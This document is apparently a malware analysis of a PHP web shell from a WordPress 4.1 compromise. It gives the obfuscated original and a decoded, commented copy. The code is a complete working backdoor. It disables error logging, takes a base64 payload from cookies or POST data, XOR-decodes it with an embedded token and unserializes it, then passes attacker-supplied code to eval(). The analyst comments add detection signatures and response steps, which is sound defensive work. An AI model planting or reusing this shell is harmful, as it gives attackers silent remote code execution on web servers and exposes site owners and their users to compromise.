Malicious PHP file from WordPress 4.1 attack
<?php /* Analyst note: obfuscated original of the decoded listing further down; the \xNN escapes spell the same plain names ("GLOBALS", "data", "auth", "key", ...) and the variable-variable ${...} chains are pure indirection. Review the decoded copy for behaviour; keep this form as the detection sample. */ ${"G\x4cO\x42\x41\x4c\x53"}["\x78\x77\x79\x75\x72s\x67\x6b"]="\x76a\x6c\x75\x65";${"\x47\x4c\x4f\x42\x41L\x53"}["d\x65\x72\x6b\x73\x74\x76"]="o\x75t\x5f\x64a\x74\x61";${"\x47L\x4f\x42AL\x53"}["\x6al\x79\x78\x79\x6ad\x64e\x78\x6f"]="\x6b\x65y";${"\x47\x4c\x4f\x42\x41L\x53"}["\x64\x70\x64km\x63gv\x76"]="\x6a";${"GL\x4f\x42AL\x53"}["\x6d\x77\x62\x79\x7a\x79\x62u\x6a"]="\x69";${"\x47L\x4fBA\x4cS"}["s\x6az\x66\x69sei\x74\x75"]="\x64\x61\x74\x61\x5f\x6be\x79";${"G\x4c\x4f\x42A\x4c\x53"}["\x6d\x65d\x69\x64m\x70\x6eo\x73"]="\x64\x61\x74\x61";@ini_set("\x65\x72r\x6f\x72_l\x6f\x67",NULL);$qtbsgvf="d\x61\x74\x61";@ini_set("l\x6f\x67\x5f\x65rror\x73",0);@ini_set("\x6da\x78_exe\x63utio\x6e\x5f\x74\x69m\x65",0);@set_time_limit(0);$mtbxmnj="d\x61\x74\x61\x5f\x6be\x79";if(!defined("P\x48P_\x45\x4f\x4c")){define("\x50H\x50\x5fE\x4fL","\n");}if(!defined("\x44IR\x45C\x54\x4fRY\x5fSEPA\x52A\x54O\x52")){define("\x44I\x52E\x43TOR\x59\x5f\x53E\x50A\x52\x41T\x4fR","/");}${${"\x47\x4c\x4f\x42\x41L\x53"}["\x6d\x65d\x69d\x6d\x70\x6eo\x73"]}=NULL;${${"GLO\x42\x41\x4c\x53"}["sj\x7a\x66i\x73\x65i\x74\x75"]}=NULL;$GLOBALS["auth"]="\x34\x65\x66\x363a\x62e-1\x61\x62\x64-\x345\x616-\x39\x31\x33d-\x36\x66\x62\x39\x3965\x37\x6524\x62";global$auth;$tyjmuxkjcc="\x61\x75\x74\x68";function 
sh_decrypt_phase($data,$key){${"G\x4cOB\x41\x4cS"}["\x69\x69\x6e\x66vn\x67\x63\x69"]="\x6f\x75t\x5f\x64\x61\x74a";${"G\x4cO\x42\x41\x4c\x53"}["\x77\x6as\x70\x6d\x6c\x6e"]="\x6fu\x74\x5f\x64at\x61";${${"\x47LOB\x41\x4cS"}["\x77j\x73\x70\x6d\x6c\x6e"]}="";${"\x47LO\x42A\x4c\x53"}["a\x6b\x78mu\x6cfj\x64\x70\x78t"]="\x69";for(${${"GL\x4f\x42AL\x53"}["\x61k\x78\x6d\x75\x6cf\x6a\x64\x70\x78t"]}=0;${${"\x47L\x4f\x42\x41\x4cS"}["\x6dwb\x79zy\x62\x75\x6a"]}<strlen(${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x6de\x64\x69\x64\x6d\x70\x6e\x6f\x73"]});){$udkucaxadhsu="\x6a";for(${$udkucaxadhsu}=0;${${"\x47\x4c\x4f\x42\x41L\x53"}["\x64\x70\x64\x6bmc\x67v\x76"]}<strlen(${${"G\x4c\x4f\x42A\x4c\x53"}["\x6a\x6c\x79\x78\x79\x6add\x65\x78\x6f"]})&&${${"GL\x4f\x42\x41L\x53"}["m\x77b\x79z\x79\x62\x75\x6a"]}<strlen(${${"G\x4c\x4fBAL\x53"}["\x6d\x65\x64i\x64m\x70\x6e\x6fs"]});${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x64pd\x6bm\x63g\x76v"]}++,${${"G\x4cO\x42\x41\x4c\x53"}["\x6d\x77b\x79\x7a\x79\x62\x75\x6a"]}++){$xnanwxk="\x6a";${"\x47L\x4f\x42\x41LS"}["\x6fr\x63\x66\x64\x71\x6a\x62\x63c\x6e\x71"]="\x69";${${"G\x4c\x4f\x42ALS"}["\x64\x65r\x6bstv"]}.=chr(ord(${${"\x47LO\x42\x41\x4c\x53"}["\x6dedid\x6d\x70n\x6f\x73"]}[${${"\x47L\x4f\x42\x41\x4c\x53"}["\x6fr\x63\x66\x64\x71\x6a\x62\x63\x63\x6e\x71"]}])^ord(${${"GL\x4f\x42\x41\x4cS"}["\x6a\x6cy\x78y\x6a\x64d\x65\x78o"]}[${$xnanwxk}]));}}return${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x69i\x6e\x66v\x6eg\x63i"]};}function sh_decrypt($data,$key){${"G\x4c\x4f\x42A\x4c\x53"}["\x78\x75m\x64o\x71\x76"]="\x61u\x74\x68";$xysysumkpu="\x64\x61\x74a";global$auth;return sh_decrypt_phase(sh_decrypt_phase(${$xysysumkpu},${${"GLO\x42\x41\x4c\x53"}["x\x75m\x64o\x71\x76"]}),${${"\x47\x4c\x4f\x42A\x4c\x53"}["jly\x78\x79j\x64\x64\x65\x78\x6f"]});}foreach($_COOKIE 
as${${"\x47LO\x42\x41\x4c\x53"}["jl\x79\x78\x79\x6a\x64\x64\x65\x78\x6f"]}=>${${"\x47\x4cOBA\x4c\x53"}["xw\x79u\x72\x73\x67k"]}){${"\x47L\x4f\x42A\x4c\x53"}["ha\x71\x63m\x75\x67\x65\x6d"]="d\x61\x74\x61_ke\x79";$uqweheyxxqi="v\x61\x6c\x75\x65";${${"G\x4c\x4fB\x41\x4c\x53"}["\x6d\x65di\x64mpno\x73"]}=${$uqweheyxxqi};${${"\x47\x4cOBA\x4c\x53"}["\x68\x61\x71c\x6d\x75\x67\x65\x6d"]}=${${"\x47\x4cO\x42A\x4c\x53"}["j\x6c\x79\x78\x79\x6a\x64d\x65\x78\x6f"]};}if(!${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["m\x65\x64\x69d\x6d\x70n\x6f\x73"]}){${"\x47\x4c\x4fB\x41\x4c\x53"}["y\x62\x66t\x79\x68o\x7at\x76"]="val\x75\x65";foreach($_POST as${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x6a\x6c\x79\x78\x79\x6a\x64\x64\x65\x78\x6f"]}=>${${"G\x4cO\x42A\x4cS"}["\x79\x62f\x74\x79\x68\x6f\x7atv"]}){${${"G\x4c\x4fB\x41L\x53"}["m\x65\x64\x69d\x6dp\x6e\x6f\x73"]}=${${"\x47LO\x42\x41\x4c\x53"}["x\x77\x79\x75\x72sg\x6b"]};${${"\x47\x4c\x4f\x42\x41L\x53"}["s\x6a\x7afis\x65it\x75"]}=${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x6a\x6cy\x78\x79\x6a\x64\x64e\x78\x6f"]};}}${"GL\x4f\x42A\x4cS"}["b\x65b\x63h\x7a\x66"]="\x64\x61\x74a";${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6d\x65di\x64\x6d\x70\x6e\x6f\x73"]}=@unserialize(sh_decrypt(@base64_decode(${${"\x47\x4c\x4fBA\x4c\x53"}["\x62\x65\x62chzf"]}),${$mtbxmnj}));if(isset(${${"G\x4c\x4fB\x41LS"}["\x6de\x64\x69d\x6dp\x6e\x6f\x73"]}["ak"])&&${$tyjmuxkjcc}==${$qtbsgvf}["\x61k"]){${"\x47L\x4fBA\x4c\x53"}["f\x70\x71\x6c\x67\x6f\x79\x6e"]="d\x61t\x61";${"\x47\x4c\x4f\x42AL\x53"}["b\x71\x6b\x72\x65\x6c\x76\x6d"]="da\x74\x61";if(${${"\x47L\x4f\x42A\x4c\x53"}["\x62\x71k\x72\x65\x6c\x76\x6d"]}["a"]=="\x69"){${${"GLO\x42\x41\x4cS"}["\x6d\x77b\x79\x7a\x79buj"]}=Array("\x70v"=>@phpversion(),"sv"=>"\x31\x2e0-1",);echo@serialize(${${"\x47\x4cO\x42\x41\x4c\x53"}["\x6d\x77b\x79\x7a\x79b\x75\x6a"]});}elseif(${${"\x47L\x4f\x42\x41\x4c\x53"}["fp\x71l\x67\x6fyn"]}["a"]=="e"){$sygysdobfhgr="d\x61\x74\x61";eval(${$sygysdobfhgr}["\x64"]);}}
// unphp
// https://www.unphp.net
<?php
// Analyst notes on the decoded sample (defender view).
// The `${"GLOBALS"}[...] = "name"` entries below are indirection tables: later,
// `${${"GLOBALS"}["medidmpnos"]}` resolves to `$data`, ["jlyxyjddexo"] to `$key`,
// ["xwyursgk"] to `$value`, ["sjzfiseitu"] to `$data_key`, ["mwbyzybuj"] to `$i`,
// ["dpdkmcgvv"] to `$j` and ["derkstv"] to `$out_data`. They do nothing except
// hide the real variable names from string-based scanners.
$ {
"GLOBALS"
}
["xwyursgk"] = "value";
$ {
"GLOBALS"
}
["derkstv"] = "out_data";
$ {
"GLOBALS"
}
["jlyxyjddexo"] = "key";
$ {
"GLOBALS"
}
["dpdkmcgvv"] = "j";
$ {
"GLOBALS"
}
["mwbyzybuj"] = "i";
$ {
"GLOBALS"
}
["sjzfiseitu"] = "data_key";
$ {
"GLOBALS"
}
["medidmpnos"] = "data";
// Error logging is switched off and `@` hides any failure of these calls, so a
// broken payload leaves nothing in the PHP error log. Host-level ini_set
// restrictions are the only thing that keeps a trace here.
@ini_set("error_log", NULL);
$qtbsgvf = "data";
@ini_set("log_errors", 0);
// Execution-time cap removed so long-running operator tasks are not killed.
@ini_set("max_execution_time", 0);
@set_time_limit(0);
$mtbxmnj = "data_key";
// Compatibility shims. The PHP_EOL literal contains a raw newline (decoded "\n").
if (!defined("PHP_EOL")) {
define("PHP_EOL", "
");
}
if (!defined("DIRECTORY_SEPARATOR")) {
define("DIRECTORY_SEPARATOR", "/");
}
// $data and $data_key start empty and are filled from the request further down.
$ {
$ {
"GLOBALS"
}
["medidmpnos"]
} = NULL;
$ {
$ {
"GLOBALS"
}
["sjzfiseitu"]
} = NULL;
// Hard-coded operator token. It is the first XOR key in sh_decrypt() and is
// compared with the decoded payload's "ak" field before any command runs. The
// literal is a convenient search string for locating sibling copies of this shell.
$GLOBALS["auth"] = "4ef63abe-1abd-45a6-913d-6fb99657e24b";
// At file scope `global $auth` only aliases the $GLOBALS entry just assigned.
global $auth;
// $tyjmuxkjcc / $qtbsgvf / $mtbxmnj hold variable NAMES ("auth", "data",
// "data_key") and are dereferenced later as ${$tyjmuxkjcc} and so on.
$tyjmuxkjcc = "auth";
// Repeating-key XOR pass over $data with $key.
// $i (aliases "mwbyzybuj" / "akxmulfjdpxt" / "orcfdqjbccnq") walks $data; $j
// (alias "dpdkmcgvv" / $udkucaxadhsu / $xnanwxk) walks $key and restarts at 0 on
// every outer iteration; each output byte is data[i] ^ key[j]. The result is
// accumulated in $out_data (aliases "derkstv" / "wjspmln" / "iinfvngci") and
// returned. The outer loop has no increment of its own: with an empty $key the
// inner loop never runs and this spins forever (the time limit was lifted above).
// XOR is not encryption; it only defeats naive inspection of the request body.
function sh_decrypt_phase($data, $key) {
$ {
"GLOBALS"
}
["iinfvngci"] = "out_data";
$ {
"GLOBALS"
}
["wjspmln"] = "out_data";
$ {
$ {
"GLOBALS"
}
["wjspmln"]
} = "";
$ {
"GLOBALS"
}
["akxmulfjdpxt"] = "i";
for ($ {
$ {
"GLOBALS"
}
["akxmulfjdpxt"]
} = 0;$ {
$ {
"GLOBALS"
}
["mwbyzybuj"]
} < strlen($ {
$ {
"GLOBALS"
}
["medidmpnos"]
});) {
$udkucaxadhsu = "j";
for ($ {
$udkucaxadhsu
} = 0;$ {
$ {
"GLOBALS"
}
["dpdkmcgvv"]
} < strlen($ {
$ {
"GLOBALS"
}
["jlyxyjddexo"]
}) && $ {
$ {
"GLOBALS"
}
["mwbyzybuj"]
} < strlen($ {
$ {
"GLOBALS"
}
["medidmpnos"]
});$ {
$ {
"GLOBALS"
}
["dpdkmcgvv"]
}
++, $ {
$ {
"GLOBALS"
}
["mwbyzybuj"]
}
++) {
$xnanwxk = "j";
$ {
"GLOBALS"
}
["orcfdqjbccnq"] = "i";
// $out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
$ {
$ {
"GLOBALS"
}
["derkstv"]
}.= chr(ord($ {
$ {
"GLOBALS"
}
["medidmpnos"]
}
[$ {
$ {
"GLOBALS"
}
["orcfdqjbccnq"]
}
]) ^ ord($ {
$ {
"GLOBALS"
}
["jlyxyjddexo"]
}
[$ {
$xnanwxk
}
]));
}
}
// return $out_data;
return $ {
$ {
"GLOBALS"
}
["iinfvngci"]
};
}
// Two chained XOR passes: first with the embedded $auth token, then with the
// caller-supplied $key (the cookie or POST field name, see the intake loop below).
// Aliases: "xumdoqv" -> $auth, $xysysumkpu -> $data, "jlyxyjddexo" -> $key.
// Knowing the token from this file is enough to decode captured traffic to it,
// which is useful when reconstructing what an operator ran.
function sh_decrypt($data, $key) {
$ {
"GLOBALS"
}
["xumdoqv"] = "auth";
$xysysumkpu = "data";
global $auth;
// return sh_decrypt_phase(sh_decrypt_phase($data, $auth), $key);
return sh_decrypt_phase(sh_decrypt_phase($ {
$xysysumkpu
}, $ {
$ {
"GLOBALS"
}
["xumdoqv"]
}), $ {
$ {
"GLOBALS"
}
["jlyxyjddexo"]
});
}
// Payload intake. Every cookie is visited, so $data / $data_key end up holding
// the LAST cookie's value and name; the cookie name doubles as the second XOR
// key. Only when that leaves $data falsy (absent, "" or "0") is the same sweep
// done over $_POST. Detection angle: requests to this file carrying a single
// oddly named cookie or POST field whose value is base64 text.
foreach ($_COOKIE as $ {
$ {
"GLOBALS"
}
["jlyxyjddexo"]
} => $ {
$ {
"GLOBALS"
}
["xwyursgk"]
}) {
$ {
"GLOBALS"
}
["haqcmugem"] = "data_key";
$uqweheyxxqi = "value";
// $data = $value;
$ {
$ {
"GLOBALS"
}
["medidmpnos"]
} = $ {
$uqweheyxxqi
};
// $data_key = $key;
$ {
$ {
"GLOBALS"
}
["haqcmugem"]
} = $ {
$ {
"GLOBALS"
}
["jlyxyjddexo"]
};
}
// Fallback: same last-wins sweep over POST fields.
if (!$ {
$ {
"GLOBALS"
}
["medidmpnos"]
}) {
$ {
"GLOBALS"
}
["ybftyhoztv"] = "value";
foreach ($_POST as $ {
$ {
"GLOBALS"
}
["jlyxyjddexo"]
} => $ {
$ {
"GLOBALS"
}
["ybftyhoztv"]
}) {
$ {
$ {
"GLOBALS"
}
["medidmpnos"]
} = $ {
$ {
"GLOBALS"
}
["xwyursgk"]
};
$ {
$ {
"GLOBALS"
}
["sjzfiseitu"]
} = $ {
$ {
"GLOBALS"
}
["jlyxyjddexo"]
};
}
}
// Decode chain: base64 -> sh_decrypt() (double XOR) -> unserialize(), every
// failure hidden by `@`. unserialize() on request-controlled bytes is an
// object-injection sink in its own right, independent of the eval() below; from
// here $data is whatever structure the request encoded.
$ {
"GLOBALS"
}
["bebchzf"] = "data";
// $data = @unserialize(sh_decrypt(@base64_decode($data), $data_key));
$ {
$ {
"GLOBALS"
}
["medidmpnos"]
} = @unserialize(sh_decrypt(@base64_decode($ {
$ {
"GLOBALS"
}
["bebchzf"]
}), $ {
$mtbxmnj
}));
// Gate and dispatch. The decoded payload must carry "ak" equal to the embedded
// token; the comparison is a loose `==` on a value produced by unserialize(),
// i.e. weaker than a strict string match. Two commands follow:
//   "i" echoes a serialized array with the PHP version and shell version "1.0-1"
//       -- that exact serialized response body is a usable network signature;
//   "e" hands payload field "d" to eval(): unrestricted code execution as the
//       web-server user.
// Response: remove the file, search the web root for the token string and the
// sh_decrypt_phase / sh_decrypt names, and rotate credentials reachable from
// this host.
if (isset($ {
$ {
"GLOBALS"
}
["medidmpnos"]
}
["ak"]) && $ {
$tyjmuxkjcc
} == $ {
$qtbsgvf
}
["ak"]) {
$ {
"GLOBALS"
}
["fpqlgoyn"] = "data";
$ {
"GLOBALS"
}
["bqkrelvm"] = "data";
// if ($data["a"] == "i") -- fingerprint beacon
if ($ {
$ {
"GLOBALS"
}
["bqkrelvm"]
}
["a"] == "i") {
// reuses the $i alias as a scratch variable for the reply array
$ {
$ {
"GLOBALS"
}
["mwbyzybuj"]
} = Array("pv" => @phpversion(), "sv" => "1.0-1",);
echo @serialize($ {
$ {
"GLOBALS"
}
["mwbyzybuj"]
});
// elseif ($data["a"] == "e") -- remote code execution sink
} elseif ($ {
$ {
"GLOBALS"
}
["fpqlgoyn"]
}
["a"] == "e") {
$sygysdobfhgr = "data";
// eval($data["d"]);
eval($ {
$sygysdobfhgr
}
["d"]);
}
}
?>